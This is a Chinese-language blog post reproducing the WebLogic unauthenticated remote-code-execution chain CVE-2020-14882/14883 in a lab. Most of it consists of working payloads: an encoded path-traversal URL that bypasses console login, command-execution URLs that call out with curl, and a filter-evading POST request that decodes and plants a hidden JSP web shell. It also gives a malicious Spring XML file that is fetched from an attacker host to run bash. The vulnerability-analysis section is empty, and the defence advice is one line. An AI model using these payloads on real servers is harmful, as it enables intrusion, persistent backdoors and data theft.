0x00 前言

简单学习WebLogic未授权RCE(CVE-2020-14882/CVE-2020-14883)漏洞。

0x01 WebLogic未授权RCE

环境搭建

用的Vulhub:https://vulhub.org/#/environments/weblogic/CVE-2020-14882/

影响版本

Oracle WebLogic Server 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0。

漏洞原理

  • CVE-2020-14883:允许未授权的用户通过目录穿越结合双重URL编码的方式来绕过管理控制台的权限验证访问后台。
  • CVE-2020-14882:允许后台任意用户通过HTTP协议执行任意命令。

漏洞复现

主要是以下两个CVE的组合利用,显示未授权访问后台,然后通过后台可以执行命令的接口实现RCE。

CVE-2020-14883

正常情况下,没有登录WebLogic的话访问console后台就会直接302跳转到/console/login/LoginForm.jsp登录界面。

但是,通过目录穿越结合双重URL编码就能绕过认证实现未授权访问console后台:

这里未授权访问的payload为:

1
http://ip:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=

CVE-2020-14882

前面的CVE虽然可以访问后台,但是是低权限用户、无法安装应用,因此这里可以通过访问如下URL触发命令执行,这里用DNSLog实现外带验证:

1
http://ip:7001/console/console.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('curl%20http://weblogic.rlk5z3.dnslog.cn');")

看到本次利用的恶意类为com.tangosol.coherence.mvel2.sh.ShellSession

组合利用

将前面两个CVE组合起来利用就能实现未授权RCE的效果:

1
http://ip:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('curl%20http://weblogic.2qokvr.dnslog.cn');")

绕xx姿势

1
2
3
4
5
6
7
8
9
10
11
12
POST /biz/%2e./console/css/%25%32e%25%32e%25%32fconsole.portal HTTP/1.1
Host: a.com
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Cookie: BIGipServerSOL3_Docker_ZB=!ZhZtHJOmr5bPDjl6JVsajan6U8tjmcsXu/RgQvH6FyBrNzbalB857UZ0cOVZRMDvApu0sGpXvBnISqc=; TS01a69607=011223a830f54e1940dbb38950c7e6a279c477815452ea36745aed14040c887138bcb023eb2c41d4ba3cd0ba478b0228afcb3ead628ca92eac2dea5d867b15ba9443d0d8de;
Content-Length: 2044
X-Forwarded-For: 223.104.96.232
Client_IP_ADDR: 223.104.96.232

_nfpb=true&_pageLabel=EJBTestHomePage&handle=com.tangosol.coherence.mvel.sh.ShellSession(%25%327Runtim%25%365.g%25%365tRuntim%25%365().%25%365x%25%365c(n%25%365w String[]{"/bin/bash","-c","find $DOMAIN_HOME -typ%25%365 d -nam%25%365 b%25%365a_wls_int%25%365rnal|whil%25%365 r%25%365ad f;do find $f -typ%25%365 f -nam%25%365 ind%25%365x.html;don%25%365|whil%25%365 r%25%365ad ff;do %25%365cho -n PCVAIHBhZ2UgY29udGVudFR5cGU9InRl%25%365HQvaHRtbDsgY2hhcnNldD1VVEYtOCIgJT4KPCVAIHBhZ2UgaW1wb3J0PSJqYXZhLmlvLioiICU%25%32BCgo8JQpTdHJpbmcgY21kID0gcmVxdWVzdC5nZXRQYXJhbWV0ZXIoImNtZCIpOwpTdHJpbmcgb3V0cHV0ID0gIiI7CmlmIChjbWQgIT1udWxsICYmIGNtZCAhPSAiIikKICAgIHsKICAgICAgICBTdHJpbmdbXSBjb21tYW5kID0gU3lzdGVtLmdldFByb3BlcnR5KCJvcy5uYW1lIikudG9Mb3dlckNhc2UoKS5pbmRl%25%365E9mKCJ3aW5kb3dzIik%25%32BLTEgPyBuZXcgU3RyaW5nW10g%25%365yJjbWQuZXhlIiwgIi9jIiwgY21kfSA6IG5ldyBTdHJpbmdbXSB7Ii9iaW4vc2giLCAiLWMiLCBjbWR9OwoKICAgICAgICBTdHJpbmcgcyA9IG51bGw7CiAgICAgICAgdHJ5CiAgICAgICAgICAgIHsKICAgICAgICAgICAgICAgIFByb2Nlc3MgcCA9IFJ1bnRpbWUuZ2V0UnVudGltZSgpLmV4ZWMoY29tbWFuZCk7CiAgICAgICAgICAgICAgICBCdWZmZXJlZFJlYWRlciBzSSA9IG5ldyBCdWZmZXJlZFJlYWRlcihuZXcgSW5wdXRTdHJlYW1SZWFkZXIocC5nZXRJbnB1dFN0cmVhbSgpKSk7CiAgICAgICAgICAgICAgICB3aGlsZSAoKHMgPSBzSS5yZWFkTGluZSgpKSAhPSBudWxsKQogICAgICAgICAgICAgICAgICAgIHsKICAgICAgICAgICAgICAgICAgICAgICAgb3V0cHV0ICs9IHMgKyJcclxuIjsKICAgICAgICAgICAgICAgICAgICB9CiAgICAgICAgICAgICAgICBCdWZmZXJlZFJlYWRlciBzSTEgPSBuZXcgQnVmZmVyZWRSZWFkZXIobmV3IElucHV0U3RyZWFtUmVhZGVyKHAuZ2V0RXJyb3JTdHJlYW0oKSkpOwogICAgICAgICAgICAgICAgd2hpbGUgKChzID0gc0kxLnJlYWRMaW5lKCkpICE9IG51bGwpCiAgICAgICAgICAgICAgICAgICAg%25%365wogICAgICAgICAgICAgICAgICAgICAgICBvdXRwdXQgKz0gcyArIlxyXG4iOwogICAgICAgICAgICAgICAgICAgIH0KICAgICAgICAgICAgfQogICAgICAgIGNhdGNoIChJT0V4Y2VwdGlvbiBlKQogICAgICAgICAgICB7CiAgICAgICAgICAgICAgICBlLnByaW50U3RhY2tUcmFjZSgpOwogICAgICAgICAgICB9CgogICAgfQogICAgZWxzZSBvdXRwdXQ9ImNtZCBzaGVsbCI7CiU%25%32BCjxwcmU%25%32BIDxjb2RlPjwlPW91dHB1dCU%25%32BIDwvY29kZT48L3ByZT4=|bas%25%36564 -d >$(dirnam%25%365 $ff)/.xzs%25%365c.jsp;don%25%365"});%25%327)

通杀的恶意类

由前面知道,利用进行命令执行的恶意类是com.tangosol.coherence.mvel2.sh.ShellSession,其只能在Weblogic 12.2.1以上版本才能利用,这是因为10.3.6版本中并不存在该恶意类。

那就换个CVE-2019-2725中提到的更为通用的恶意类com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext,其对所有版本的WebLogic均有效。

FileSystemXmlApplicationContext类原理:该类会远程加载目标服务器上的XML文件并进行解析,其中可以指定解析的Bean为ProcessBuilder类及其start()函数、构造函数参数为恶意命令,进而实现RCE。

首先,需要将恶意XML文件放置在攻击者服务器上,前提是WebLogic服务器能访问得到:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
   xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
   xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
        <constructor-arg>
          <list>
            <value>bash</value>
            <value>-c</value>
            <value><![CDATA[curl http://weblogic.pqczq8.dnslog.cn]]></value>
          </list>
        </constructor-arg>
    </bean>
</beans>

接着,同前面的方法,让WebLogic服务器去加载该恶意XML文件:

1
http://ip:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://attacker.com/rce.xml")

漏洞分析

待分析…

工具

参考:https://github.com/GGyao/CVE-2020-14882_ALL

防御方法

升级WebLogic版本。